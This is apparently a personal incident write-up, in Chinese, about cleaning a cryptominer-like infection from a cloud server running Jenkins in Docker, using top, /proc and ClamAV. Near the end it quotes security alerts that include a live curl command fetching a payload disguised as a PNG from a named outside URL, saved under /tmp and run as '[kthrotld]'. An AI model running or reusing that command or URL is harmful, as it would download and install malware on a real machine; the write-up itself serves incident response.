事件
阿里云告警:
您的云服务器(XXXXX)由于被检测到对外攻击,已阻断该服务器对其它服务器端口(XXX)的访问,阻断预计将在XXXXXX时间内结束,请及时进行安全自查。
登录服务器(Ubuntu 16.04.4 LTS),发现CPU满载,docker下的jekins各种重启。
定位进程
top命令,发现CPU占用很高的是一个叫migration的进程,这个进程不是我开启的。
kill -9 PID 杀掉,果然安静了。
但是没过几分钟,这个进程又起来了,看来有程序自动启动它。
ll /proc/PID 看到 exe ->/tmp/migration(deleted) ,厉害了,可执行文件居然已经被删了。
pstree -a 查看进程树,一样也没找到这个进程。
定位进程失败!
人肉筛查
kill掉migration,再打开top, 试图通过肉眼观察出有没有进程突然闪现,naive!啥也没捕获到。
kill掉migration,再iftop -PB,试图通过观察网络使用情况来发现启动进程,然并卵。
clamav
无奈,祭出查毒工具clamav,这个工具默认只查毒报警不做处理。
- 安装
apt-get install clamav
提示我apt-get update,于是先更新了一下
- 下载病毒库
freshclam
- 扫描并记录日志
clamscan -r /home/jekins -l /tmp/clamav.log
数个小时之后,扫描结束。log的SCAN SUMMARY中显示Infected files:2,这里坑的是log里面每个文件都输出了结果,导致很不好找,还好机智的查了一下有毒文件会标识FOUND,轻松搜到。
其实可以用命令clamscan -r --bell -i /home/jekins
,只显示有问题的文件并发出报警声。
总之,查到病毒文件是一个很深很深的目录下的两个76eb30d638ac40文件,直接删除,再kill -9 PID,到此彻底查杀了。
来源
后来查看阿里云的云安全中心预警信息,发现了2条预警,可见恶意进程和来源。
恶意进程(云查杀)-访问恶意IP待处理
…
进程路径:/tmp/76eb30d638ac40
命令行参数:[kthrotld]
进程异常行为-访问恶意下载源待处理
父进程路径:/bin/dash
父进程命令行:sh
…
URL链接:http://img.sobot.com/chatres/89/msg/20191022/78e3582c42824f17aba17feefb87ea5f.png
进程路径:/usr/bin/curl
命令行参数:curl -fsSL -m15 img.sobot.com/chatres/89/msg/20191022/78e3582c42824f17aba17feefb87ea5f.png -o 76eb30d638ac40